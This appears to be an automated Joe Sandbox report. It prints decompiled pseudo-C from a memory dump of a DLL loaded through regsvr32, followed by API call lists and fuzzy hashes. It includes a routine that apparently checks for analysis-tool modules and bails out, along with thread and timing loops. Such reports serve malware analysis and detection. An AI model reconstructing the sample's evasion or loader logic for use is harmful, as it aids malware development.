                  						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                  						_t260 =  *_t66;
                  						__eflags =  *_t65 - _t260 - _t232;
                  						if( *_t65 - _t260 <= _t232) {
                  							_t67 = _t272 + 0x38; // 0xf47d8bff
                  							_t261 = _t260 - _t224;
                  							 *(_t272 + 0x6c) = _t261;
                  							memcpy( *_t67,  *_t67 + _t224, _t261);
                  							_t70 = _t272 + 0x16b0; // 0xdf750008
                  							_t188 =  *_t70;
                  							_t273 = _t273 + 0xc;
                  							_t232 = _a4;
                  							__eflags = _t188 - 2;
                  							if(_t188 < 2) {
                  								_t189 = _t188 + 1;
                  								__eflags = _t189;
                  								 *(_t272 + 0x16b0) = _t189;
                  							}
                  						}
                  						_t73 = _t272 + 0x38; // 0xf47d8bff
                  						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                  						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                  						_t225 = _a4;
                  						_t273 = _t273 + 0xc;
                  						_t76 = _t272 + 0x6c;
                  						 *_t76 =  *(_t272 + 0x6c) + _t225;
                  						__eflags =  *_t76;
                  						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                  						_t184 =  *_t78;
                  						_t79 = _t272 + 0x2c; // 0x8df075ff
                  						_t239 =  *_t79;
                  					} else {
                  						 *(_t272 + 0x16b0) = 2;
                  						_t61 = _t272 + 0x38; // 0xf47d8bff
                  						memcpy( *_t61,  *_t142 - _t224, _t224);
                  						_t62 = _t272 + 0x2c; // 0x8df075ff
                  						_t184 =  *_t62;
                  						_t273 = _t273 + 0xc;
                  						_t225 = _a4;
                  						_t239 = _t184;
                  						 *(_t272 + 0x6c) = _t184;
                  					}
                  					_t254 = _t184;
                  					 *(_t272 + 0x5c) = _t184;
                  					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
                  					_t185 =  *_t81;
                  					_t240 = _t239 - _t185;
                  					_t241 =  <=  ? _t225 : _t240;
                  					_t242 = ( <=  ? _t225 : _t240) + _t185;
                  					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                  				}
                  				if( *(_t272 + 0x16c0) < _t254) {
                  					 *(_t272 + 0x16c0) = _t254;
                  				}
                  				if(_t269 == 0) {
                  					_t218 = _a8;
                  					__eflags = _t218;
                  					if(_t218 == 0) {
                  						L34:
                  						_t89 = _t272 + 0x3c; // 0x830cc483
                  						_t219 =  *_t272;
                  						_t145 =  *_t89 - _t254 - 1;
                  						_a4 =  *_t272;
                  						_t234 = _t254;
                  						_v16 = _t145;
                  						_v8 = _t254;
                  						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                  						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                  							_v8 = _t254;
                  							_t95 = _t272 + 0x5c; // 0x84e85000
                  							_a4 = _t219;
                  							_t234 = _t254;
                  							_t97 = _t272 + 0x2c; // 0x8df075ff
                  							__eflags =  *_t95 -  *_t97;
                  							if( *_t95 >=  *_t97) {
                  								_t98 = _t272 + 0x2c; // 0x8df075ff
                  								_t167 =  *_t98;
                  								_t259 = _t254 - _t167;
                  								_t99 = _t272 + 0x38; // 0xf47d8bff
                  								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                  								 *(_t272 + 0x6c) = _t259;
                  								memcpy( *_t99, _t167 +  *_t99, _t259);
                  								_t103 = _t272 + 0x16b0; // 0xdf750008
                  								_t170 =  *_t103;
                  								_t273 = _t273 + 0xc;
                  								__eflags = _t170 - 2;
                  								if(_t170 < 2) {
                  									_t172 = _t170 + 1;
                  									__eflags = _t172;
                  									 *(_t272 + 0x16b0) = _t172;
                  								}
                  								_t106 = _t272 + 0x2c; // 0x8df075ff
                  								_t145 = _v16 +  *_t106;
                  								__eflags = _t145;
                  								_a4 =  *_t272;
                  								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                  								_t234 =  *_t108;
                  								_v8 = _t234;
                  							}
                  						}
                  						_t111 = _a4 + 4; // 0x0
                  						_t220 =  *_t111;
                  						__eflags = _t145 - _t220;
                  						_t221 =  <=  ? _t145 : _t220;
                  						_t146 = _t221;
                  						_a4 = _t221;
                  						_t222 = _a8;
                  						__eflags = _t146;
                  						if(_t146 != 0) {
                  							_t114 = _t272 + 0x38; // 0xf47d8bff
                  							E10014C30(_t255,  *_t114 + _v8, _t146);
                  							_t273 = _t273 + 0xc;
                  							_t117 = _t272 + 0x6c;
                  							 *_t117 =  *(_t272 + 0x6c) + _a4;
                  							__eflags =  *_t117;
                  							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                  							_t234 =  *_t119;
                  						}
                  						__eflags =  *(_t272 + 0x16c0) - _t234;
                  						if( *(_t272 + 0x16c0) < _t234) {
                  							 *(_t272 + 0x16c0) = _t234;
                  						}
                  						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
                  						_t123 = _t272 + 0xc; // 0x452bf84d
                  						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                  						__eflags = _t257 - 0xffff;
                  						_t258 =  >  ? 0xffff : _t257;
                  						_t124 = _t272 + 0x2c; // 0x8df075ff
                  						_t151 =  *_t124;
                  						_t125 = _t272 + 0x5c; // 0x84e85000
                  						_t235 = _t234 -  *_t125;
                  						__eflags = _t258 - _t151;
                  						_t152 =  <=  ? _t258 : _t151;
                  						__eflags = _t235 - ( <=  ? _t258 : _t151);
                  						if(_t235 >= ( <=  ? _t258 : _t151)) {
                  							L49:
                  							__eflags = _t235 - _t258;
                  							_t154 =  >  ? _t258 : _t235;
                  							_a4 =  >  ? _t258 : _t235;
                  							__eflags = _t222 - 4;
                  							if(_t222 != 4) {
                  								L53:
                  								_t269 = 0;
                  								__eflags = 0;
                  							} else {
                  								_t161 =  *_t272;
                  								__eflags =  *(_t161 + 4);
                  								_t154 = _a4;
                  								if( *(_t161 + 4) != 0) {
                  									goto L53;
                  								} else {
                  									__eflags = _t154 - _t235;
                  									if(_t154 != _t235) {
                  										goto L53;
                  									} else {
                  										_t269 = _t222 - 3;
                  									}
                  								}
                  							}
                  							_t131 = _t272 + 0x38; // 0xf47d8bff
                  							_t132 = _t272 + 0x5c; // 0x84e85000
                  							E10015D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                  							_t134 = _t272 + 0x5c;
                  							 *_t134 =  *(_t272 + 0x5c) + _a4;
                  							__eflags =  *_t134;
                  							E10014AF0( *_t134,  *_t272);
                  						} else {
                  							__eflags = _t235;
                  							if(_t235 != 0) {
                  								L46:
                  								__eflags = _t222;
                  								if(_t222 != 0) {
                  									_t162 =  *_t272;
                  									__eflags =  *(_t162 + 4);
                  									if( *(_t162 + 4) == 0) {
                  										__eflags = _t235 - _t258;
                  										if(_t235 <= _t258) {
                  											goto L49;
                  										}
                  									}
                  								}
                  							} else {
                  								__eflags = _t222 - 4;
                  								if(_t222 == 4) {
                  									goto L46;
                  								}
                  							}
                  						}
                  						asm("sbb edi, edi");
                  						_t271 =  ~_t269 & 0x00000002;
                  						__eflags = _t271;
                  						return _t271;
                  					} else {
                  						__eflags = _t218 - 4;
                  						if(_t218 == 4) {
                  							goto L34;
                  						} else {
                  							_t173 =  *_t272;
                  							__eflags =  *(_t173 + 4);
                  							if( *(_t173 + 4) != 0) {
                  								goto L34;
                  							} else {
                  								_t88 = _t272 + 0x5c; // 0x84e85000
                  								__eflags = _t254 -  *_t88;
                  								if(_t254 !=  *_t88) {
                  									goto L34;
                  								} else {
                  									return 1;
                  								}
                  							}
                  						}
                  					}
                  				} else {
                  					return 3;
                  				}
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID:
                  • API String ID: 3510742995-0
                  • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                  • Instruction ID: 4fdc6b10e7b7168a0789f31eb0048a9ad86d4efd395f939b62a688ab4a7349d5
                  • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                  • Instruction Fuzzy Hash: FAD112B5600A009FCB24CF69D8D4A6AB7F1FF88344B25892DE88ACB711D771E9958B50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 70%
                  			E10004D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
                  				char _v516;
                  				char _v556;
                  				char _v564;
                  				char _v568;
                  				char _v572;
                  				char _v576;
                  				intOrPtr _v580;
                  				char _v588;
                  				signed int _v596;
                  				intOrPtr _v602;
                  				intOrPtr _v604;
                  				char _v608;
                  				CHAR* _v612;
                  				CHAR* _v616;
                  				signed int _v620;
                  				signed int _v624;
                  				signed int _v628;
                  				signed int _v632;
                  				char _v636;
                  				intOrPtr _t119;
                  				signed int _t122;
                  				CHAR* _t124;
                  				intOrPtr _t125;
                  				CHAR* _t127;
                  				WCHAR* _t130;
                  				intOrPtr _t133;
                  				intOrPtr _t137;
                  				WCHAR* _t138;
                  				intOrPtr _t142;
                  				WCHAR* _t143;
                  				CHAR* _t144;
                  				intOrPtr _t145;
                  				intOrPtr _t150;
                  				intOrPtr _t153;
                  				WCHAR* _t154;
                  				signed int _t159;
                  				WCHAR* _t160;
                  				intOrPtr _t163;
                  				intOrPtr _t165;
                  				intOrPtr _t166;
                  				intOrPtr _t170;
                  				signed int _t173;
                  				signed int _t178;
                  				intOrPtr _t182;
                  				WCHAR* _t184;
                  				char _t186;
                  				WCHAR* _t188;
                  				intOrPtr _t200;
                  				intOrPtr _t211;
                  				signed int _t215;
                  				char _t220;
                  				WCHAR* _t231;
                  				intOrPtr _t235;
                  				intOrPtr _t238;
                  				intOrPtr _t239;
                  				intOrPtr _t246;
                  				signed int _t248;
                  				WCHAR* _t249;
                  				CHAR* _t250;
                  				intOrPtr _t262;
                  				void* _t271;
                  				intOrPtr _t272;
                  				signed int _t277;
                  				void* _t278;
                  				intOrPtr _t280;
                  				signed int _t282;
                  				void* _t298;
                  				void* _t299;
                  				intOrPtr _t305;
                  				CHAR* _t326;
                  				void* _t328;
                  				WCHAR* _t329;
                  				intOrPtr _t331;
                  				WCHAR* _t333;
                  				signed int _t335;
                  				intOrPtr* _t337;
                  				void* _t338;
                  				void* _t339;
                  				void* _t353;
                  
                  				_t353 = __fp0;
                  				_t337 = (_t335 & 0xfffffff8) - 0x26c;
                  				_t119 =  *0x1001e688; // 0x2bb0590
                  				_v620 = _v620 & 0x00000000;
                  				_t328 = __ecx;
                  				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
                  					L7:
                  					_t14 = E1000B7A8(0x1001b9c8,  &_v516) + 1; // 0x1
                  					E1000A86D( &_v556, _t14, _t351);
                  					_t298 = 0x64;
                  					_t122 = E1000A471( &_v556, _t298);
                  					 *0x1001e748 = _t122;
                  					if(_t122 != 0) {
                  						_push(0x4e5);
                  						_t299 = 0x10;
                  						 *0x1001e680 = E1000E1BC(0x1001b9cc, _t299);
                  						 *_t337 = 0x610;
                  						_t124 = E100095E1(0x1001b9cc);
                  						_push(0);
                  						_push(_t124);
                  						_v612 = _t124;
                  						_t125 =  *0x1001e688; // 0x2bb0590
                  						_t127 = E100092E5(_t125 + 0x228);
                  						_t338 = _t337 + 0xc;
                  						_v616 = _t127;
                  						E100085D5( &_v612);
                  						_t130 = E1000B269(_t127);
                  						_t246 = 3;
                  						__eflags = _t130;
                  						if(_t130 != 0) {
                  							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
                  							 *_t328 = _t246;
                  						}
                  						E1000861A( &_v616, 0xfffffffe);
                  						_t133 =  *0x1001e688; // 0x2bb0590
                  						_t21 = _t133 + 0x110; // 0x2c2fd98
                  						_t22 = _t133 + 0x114; // 0x2bb06a4
                  						E10004A0B( *((intOrPtr*)( *_t21)), _t22, _t353, _t328, 0, 0);
                  						_t262 =  *0x1001e688; // 0x2bb0590
                  						_t339 = _t338 + 0x14;
                  						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
                  						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
                  							L17:
                  							asm("stosd");
                  							asm("stosd");
                  							asm("stosd");
                  							asm("stosd");
                  							asm("stosd");
                  							_v572 = _t328;
                  							_t28 = _t262 + 0x214; // 0x2
                  							_v576 =  *_t28;
                  							_t137 =  *0x1001e680; // 0x0
                  							_t138 =  *(_t137 + 8);
                  							__eflags = _t138;
                  							if(_t138 != 0) {
                  								 *_t138(0, 0, 1,  &_v568,  &_v564);
                  							}
                  							_v620 = _v620 & 0x00000000;
                  							E1000E2C6(_t353,  &_v576);
                  							_pop(_t262);
                  							_t142 =  *0x1001e6b4; // 0x2c2fc48
                  							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
                  							__eflags = _t143;
                  							if(_t143 == 0) {
                  								E1000E2C6(_t353,  &_v588);
                  								_t235 =  *0x1001e6b4; // 0x2c2fc48
                  								_pop(_t262);
                  								 *((intOrPtr*)(_t235 + 0xc))(_v632);
                  							}
                  							__eflags =  *0x1001e73c;
                  							if( *0x1001e73c <= 0) {
                  								goto L36;
                  							} else {
                  								_t165 =  *0x1001e680; // 0x0
                  								__eflags =  *(_t165 + 8);
                  								if( *(_t165 + 8) != 0) {
                  									_t231 =  *(_t165 + 0xc);
                  									__eflags = _t231;
                  									if(_t231 != 0) {
                  										 *_t231(_v580);
                  									}
                  								}
                  								_t166 =  *0x1001e688; // 0x2bb0590
                  								_t45 = _t166 + 0x214; // 0x2
                  								_t262 =  *_t45;
                  								__eflags = _t262 - _t246;
                  								if(_t262 == _t246) {
                  									goto L36;
                  								} else {
                  									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
                  									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
                  										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
                  										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
                  											E100049A5();
                  											asm("stosd");
                  											asm("stosd");
                  											asm("stosd");
                  											asm("stosd");
                  											_t170 =  *0x1001e684; // 0x2c2faa0
                  											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
                  											_t262 = _v602;
                  											_t248 = 0x3c;
                  											_t173 = _t262 + 0x00000002 & 0x0000ffff;
                  											_v596 = _t173;
                  											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
                  											_t178 = _t262 + 0x0000000e & 0x0000ffff;
                  											_v624 = _t178;
                  											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
                  											_t182 =  *0x1001e688; // 0x2bb0590
                  											_t184 = E1000FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
                  											_t339 = _t339 + 0xc;
                  											__eflags = _t184;
                  											if(_t184 >= 0) {
                  												_t333 = E10008604(0x1000);
                  												_v616 = _t333;
                  												_pop(_t262);
                  												__eflags = _t333;
                  												if(_t333 != 0) {
                  													_t186 = E1000109A(_t262, 0x148);
                  													_t305 =  *0x1001e688; // 0x2bb0590
                  													_v636 = _t186;
                  													_push(_t305 + 0x648);
                  													_push(0xa);
                  													_push(7);
                  													_t271 = 2;
                  													E1000902D(_t271,  &_v572);
                  													_t272 =  *0x1001e688; // 0x2bb0590
                  													_t92 = _t272 + 0xa0; // 0x1
                  													_t188 = E100060DF( &_v572, _t272 + 0x228, 1,  *_t92);
                  													_t339 = _t339 + 0x18;
                  													_v632 = _t188;
                  													__eflags = _t188;
                  													if(_t188 != 0) {
                  														_push(_v624 % _t248 & 0x0000ffff);
                  														_push(_v628 & 0x0000ffff);
                  														_push(_v596 % _t248 & 0x0000ffff);
                  														_push(_v620 & 0x0000ffff);
                  														_push(_v632);
                  														_push( &_v572);
                  														_t200 =  *0x1001e688; // 0x2bb0590
                  														__eflags = _t200 + 0x1020;
                  														E10009640(_t333, 0x1000, _v636, _t200 + 0x1020);
                  														E100085D5( &_v636);
                  														E1000A911(_t333, 0, 0xbb8, 1);
                  														E1000861A( &_v632, 0xfffffffe);
                  														_t339 = _t339 + 0x44;
                  													}
                  													E1000861A( &_v616, 0xfffffffe);
                  													_pop(_t262);
                  												}
                  											}
                  										}
                  										goto L36;
                  									}
                  									__eflags = _t262 - 2;
                  									if(_t262 != 2) {
                  										goto L36;
                  									}
                  									E100049A5();
                  									asm("stosd");
                  									asm("stosd");
                  									asm("stosd");
                  									asm("stosd");
                  									_t211 =  *0x1001e684; // 0x2c2faa0
                  									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
                  									_t215 = _v602 + 0x00000002 & 0x0000ffff;
                  									_v628 = _t215;
                  									_t277 = 0x3c;
                  									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
                  									_t249 = E10008604(0x1000);
                  									_v624 = _t249;
                  									_pop(_t278);
                  									__eflags = _t249;
                  									if(_t249 != 0) {
                  										_t220 = E100095E1(_t278, 0x32d);
                  										_t280 =  *0x1001e688; // 0x2bb0590
                  										_push(_t280 + 0x228);
                  										_t282 = 0x3c;
                  										_v636 = _t220;
                  										_push(_v628 % _t282 & 0x0000ffff);
                  										E10009640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
                  										E100085D5( &_v636);
                  										E1000A911(_t249, 0, 0xbb8, 1);
                  										E1000861A( &_v624, 0xfffffffe);
                  									}
                  									goto L41;
                  								}
                  							}
                  						} else {
                  							_t24 = _t262 + 0x214; // 0x2
                  							_t238 =  *_t24;
                  							__eflags = _t238 - _t246;
                  							if(_t238 == _t246) {
                  								goto L17;
                  							}
                  							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
                  							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
                  								L36:
                  								_t144 = E100095E1(_t262, 0x610);
                  								_push(0);
                  								_push(_t144);
                  								_v616 = _t144;
                  								_t145 =  *0x1001e688; // 0x2bb0590
                  								_t329 = E100092E5(_t145 + 0x228);
                  								_v612 = _t329;
                  								__eflags = _t329;
                  								if(_t329 != 0) {
                  									_t160 = E1000B269(_t329);
                  									__eflags = _t160;
                  									if(_t160 != 0) {
                  										_t163 =  *0x1001e684; // 0x2c2faa0
                  										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
                  									}
                  									E1000861A( &_v612, 0xfffffffe);
                  								}
                  								E100085D5( &_v616);
                  								_t150 =  *0x1001e688; // 0x2bb0590
                  								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
                  								_t153 =  *0x1001e688; // 0x2bb0590
                  								_t154 = _t153 + 0x228;
                  								__eflags = _t154;
                  								lstrcpynW(_t154,  *0x1001e738, 0x105);
                  								_t331 =  *0x1001e688; // 0x2bb0590
                  								_t117 = _t331 + 0x228; // 0x2bb07b8
                  								 *((intOrPtr*)(_t331 + 0x434)) = E10008FBE(_t117, __eflags);
                  								E1000861A(0x1001e740, 0xfffffffe);
                  								E1000861A(0x1001e738, 0xfffffffe);
                  								L41:
                  								_t159 = 0;
                  								__eflags = 0;
                  								L42:
                  								return _t159;
                  							}
                  							__eflags = _t238 - 2;
                  							if(_t238 != 2) {
                  								goto L36;
                  							}
                  							goto L17;
                  						}
                  					}
                  					L8:
                  					_t159 = _t122 | 0xffffffff;
                  					goto L42;
                  				}
                  				_t250 = E100095C7(0x6e2);
                  				_v616 = _t250;
                  				_t326 = E100095C7(0x9f5);
                  				_v612 = _t326;
                  				if(_t250 != 0 && _t326 != 0) {
                  					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
                  						_v620 = 1;
                  					}
                  					E100085C2( &_v616);
                  					_t122 = E100085C2( &_v612);
                  					_t351 = _v620;
                  					if(_v620 != 0) {
                  						goto L8;
                  					}
                  				}
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC0
                  • GetModuleHandleA.KERNEL32(00000000), ref: 10004DC7
                  • lstrcpynW.KERNEL32(02BB0158,00000105), ref: 1000526F
                  • lstrcpynW.KERNEL32(02BB0368,00000105), ref: 10005283
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: HandleModulelstrcpyn
                  • String ID:
                  • API String ID: 3430401031-0
                  • Opcode ID: d3734a70cf2f26b07b6158fdd21bfb9247da90fd0041dfad8ad4158361da4cd7
                  • Instruction ID: cc48400d40a66e7674bcd18edc35038107661711004b249490cc292a5082b98a
                  • Opcode Fuzzy Hash: d3734a70cf2f26b07b6158fdd21bfb9247da90fd0041dfad8ad4158361da4cd7
                  • Instruction Fuzzy Hash: A7E1CC71608341AFF340CF64CC86F6A73E9EB88390F454A29F584DB2D5EB75EA448B52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
                  				char _v16;
                  				intOrPtr _v20;
                  				char _v24;
                  				char _v28;
                  				void* _t13;
                  				intOrPtr _t15;
                  				signed int _t16;
                  				intOrPtr _t17;
                  				signed int _t18;
                  				char _t20;
                  				intOrPtr _t22;
                  				void* _t23;
                  				void* _t24;
                  				intOrPtr _t29;
                  				intOrPtr _t35;
                  				intOrPtr _t41;
                  				intOrPtr _t43;
                  				intOrPtr _t48;
                  				void* _t51;
                  				signed int _t61;
                  				signed int _t64;
                  				void* _t71;
                  
                  				_t71 = __fp0;
                  				_t61 = __ecx;
                  				_t41 =  *0x1001e6dc; // 0x0
                  				_t13 = E1000A4BF(_t41, 0);
                  				while(_t13 < 0) {
                  					E1000980C( &_v28);
                  					_t43 =  *0x1001e6e0; // 0x0
                  					_t15 =  *0x1001e6e4; // 0x0
                  					_t41 = _t43 + 0xe10;
                  					asm("adc eax, ebx");
                  					__eflags = _t15 - _v24;
                  					if(__eflags > 0) {
                  						L9:
                  						_t16 = 0xfffffffe;
                  						L13:
                  						return _t16;
                  					}
                  					if(__eflags < 0) {
                  						L4:
                  						_t17 =  *0x1001e684; // 0x2c2faa0
                  						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
                  						__eflags = _t18;
                  						if(_t18 == 0) {
                  							break;
                  						}
                  						_t35 =  *0x1001e684; // 0x2c2faa0
                  						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
                  						_t41 =  *0x1001e6dc; // 0x0
                  						__eflags = 0;
                  						_t13 = E1000A4BF(_t41, 0);
                  						continue;
                  					}
                  					__eflags = _t41 - _v28;
                  					if(_t41 >= _v28) {
                  						goto L9;
                  					}
                  					goto L4;
                  				}
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				_t20 =  *0x1001e6e8; // 0x0
                  				_v28 = _t20;
                  				_t22 = E1000A6A9(_t41, _t61,  &_v16);
                  				_v20 = _t22;
                  				if(_t22 != 0) {
                  					_t23 = GetCurrentProcess();
                  					_t24 = GetCurrentThread();
                  					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
                  					E1000980C(0x1001e6e0);
                  					_t64 = E10001A1B( &_v28, E10001226, _t71);
                  					__eflags = _t64;
                  					if(_t64 >= 0) {
                  						_push(0);
                  						_push( *0x1001e760);
                  						_t51 = 0x27;
                  						E10009F06(_t51);
                  					}
                  				} else {
                  					_t64 = _t61 | 0xffffffff;
                  				}
                  				_t29 =  *0x1001e684; // 0x2c2faa0
                  				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
                  				_t48 =  *0x1001e6dc; // 0x0
                  				 *0x1001e6d0 = 0;
                  				E1000A4DB(_t48);
                  				E1000861A( &_v24, 0);
                  				_t16 = _t64;
                  				goto L13;
                  			}

                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
                  • Instruction ID: 912c1b93fe30e14ebce55579952f4eddc1cb52f7c5d97e94b218bb2c615be3ff
                  • Opcode Fuzzy Hash: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
                  • Instruction Fuzzy Hash: C831C036604264AFF344DFA4DCC5C6E77A9FB983D0B904A2AF941C32A5DA30ED048B52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E10001B2D(void* __eflags, void* __fp0) {
                  				char _v24;
                  				char _v28;
                  				void* _t12;
                  				intOrPtr _t14;
                  				void* _t15;
                  				intOrPtr _t16;
                  				void* _t17;
                  				void* _t19;
                  				void* _t20;
                  				char _t24;
                  				intOrPtr _t26;
                  				intOrPtr _t28;
                  				intOrPtr _t33;
                  				intOrPtr _t38;
                  				intOrPtr _t40;
                  				void* _t41;
                  				intOrPtr _t46;
                  				void* _t48;
                  				intOrPtr _t51;
                  				void* _t61;
                  				void* _t71;
                  
                  				_t71 = __fp0;
                  				_t38 =  *0x1001e6f4; // 0x0
                  				_t12 = E1000A4BF(_t38, 0);
                  				while(_t12 < 0) {
                  					E1000980C( &_v28);
                  					_t40 =  *0x1001e700; // 0x0
                  					_t14 =  *0x1001e704; // 0x0
                  					_t41 = _t40 + 0x3840;
                  					asm("adc eax, ebx");
                  					__eflags = _t14 - _v24;
                  					if(__eflags > 0) {
                  						L13:
                  						_t15 = 0;
                  					} else {
                  						if(__eflags < 0) {
                  							L4:
                  							_t16 =  *0x1001e684; // 0x2c2faa0
                  							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
                  							__eflags = _t17;
                  							if(_t17 == 0) {
                  								break;
                  							} else {
                  								_t33 =  *0x1001e684; // 0x2c2faa0
                  								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
                  								_t51 =  *0x1001e6f4; // 0x0
                  								__eflags = 0;
                  								_t12 = E1000A4BF(_t51, 0);
                  								continue;
                  							}
                  						} else {
                  							__eflags = _t41 - _v28;
                  							if(_t41 >= _v28) {
                  								goto L13;
                  							} else {
                  								goto L4;
                  							}
                  						}
                  					}
                  					L12:
                  					return _t15;
                  				}
                  				E1000980C(0x1001e700);
                  				_t19 = GetCurrentProcess();
                  				_t20 = GetCurrentThread();
                  				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				_t24 =  *0x1001e6e8; // 0x0
                  				_v28 = _t24;
                  				_t61 = E10001A1B( &_v28, E1000131E, _t71);
                  				if(_t61 >= 0) {
                  					_push(0);
                  					_push( *0x1001e760);
                  					_t48 = 0x27;
                  					E10009F06(_t48);
                  				}
                  				if(_v24 != 0) {
                  					E10006890( &_v24);
                  				}
                  				_t26 =  *0x1001e684; // 0x2c2faa0
                  				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
                  				_t28 =  *0x1001e758; // 0x0
                  				 *0x1001e6ec = 0;
                  				_t29 =  !=  ? 1 : _t28;
                  				_t46 =  *0x1001e6f4; // 0x0
                  				 *0x1001e758 =  !=  ? 1 : _t28;
                  				E1000A4DB(_t46);
                  				_t15 = _t61;
                  				goto L12;
                  			}

                  APIs
                  • GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
                  • GetCurrentThread.KERNEL32(00000000), ref: 10001BCF
                  • GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
                  • DuplicateHandle.KERNEL32 ref: 10001BD9
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: Current$Process$DuplicateHandleThread
                  • String ID:
                  • API String ID: 3566409357-0
                  • Opcode ID: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
                  • Instruction ID: 6a0302f5f4fd7db6b8bd225124d86af098f07b21623db759acfbad22203cc7cf
